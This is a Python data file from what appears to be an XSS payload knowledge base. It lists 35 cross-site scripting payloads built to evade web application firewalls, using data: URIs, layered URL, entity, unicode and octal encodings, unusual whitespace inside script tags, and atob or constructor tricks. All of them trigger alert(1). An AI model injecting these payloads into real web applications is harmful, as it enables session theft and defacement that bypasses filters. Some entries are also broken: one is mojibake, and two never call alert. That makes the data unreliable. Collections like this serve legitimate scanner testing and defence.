#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Filter Evasion Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


FILTER_EVASION_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "filter_evasion_036": PayloadEntry(
        payload='<img src="data:image/svg+xml,<svg onload=alert(1)>">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_037": PayloadEntry(
        payload='<object data="data:text/html,<script>alert(1)</script>">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_038": PayloadEntry(
        payload='<embed src="data:text/html,<script>alert(1)</script>">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_039": PayloadEntry(
        payload="&LT;script&GT;alert(1)&LT;/script&GT;",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_040": PayloadEntry(
        payload="%3cscript%3ealert(1)%3c/script%3e",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_041": PayloadEntry(
        payload="%3CSCRIPT%3EALERT(1)%3C/SCRIPT%3E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_042": PayloadEntry(
        payload="\\u003Cscript\\u003Ealert(1)\\u003C/script\\u003E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_043": PayloadEntry(
        payload="\\x3Cscript\\x3Ealert(1)\\x3C/script\\x3E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_044": PayloadEntry(
        payload="\\74script\\76alert(1)\\74/script\\76",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_045": PayloadEntry(
        payload="пїЅpїЅscriptпїЅпїЅalert(1)пїЅпїЅ/scriptпїЅпїЅ",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_046": PayloadEntry(
        payload="%3Cscr&#105;pt%3Ealert(1)%3C/scr&#105;pt%3E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_047": PayloadEntry(
        payload="&lt;scr%69pt&gt;alert(1)&lt;/scr%69pt&gt;",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_048": PayloadEntry(
        payload="&#60;scr\\x69pt&#62;alert(1)&#60;/scr\\x69pt&#62;",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_049": PayloadEntry(
        payload="<script\x0b>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_050": PayloadEntry(
        payload="<script\x0c>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_051": PayloadEntry(
        payload="<script >alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_052": PayloadEntry(
        payload="<script\u2000>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_053": PayloadEntry(
        payload="<script\u2001>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_054": PayloadEntry(
        payload="<script\u2002>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_055": PayloadEntry(
        payload="<script\u2003>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_056": PayloadEntry(
        payload="<script\u2004>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_057": PayloadEntry(
        payload="<script\u2005>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_058": PayloadEntry(
        payload="<script\u2006>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_059": PayloadEntry(
        payload="<script\u2007>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_060": PayloadEntry(
        payload="<script\u2008>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_061": PayloadEntry(
        payload="<script\u2009>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_062": PayloadEntry(
        payload="<script\u200a>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_063": PayloadEntry(
        payload="<script\u200b>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_064": PayloadEntry(
        payload="<script\u3000>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_065": PayloadEntry(
        payload="<script \t\n>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_066": PayloadEntry(
        payload="<script   >alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_067": PayloadEntry(
        payload="<script\t\t\t>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_068": PayloadEntry(
        payload="<script>alert[String.fromCharCode(49)]</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_069": PayloadEntry(
        payload='<script>window[atob("YWxlcnQ=")][1]</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_070": PayloadEntry(
        payload="<script>Object.constructor.constructor`alert\\`1\\```</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
}
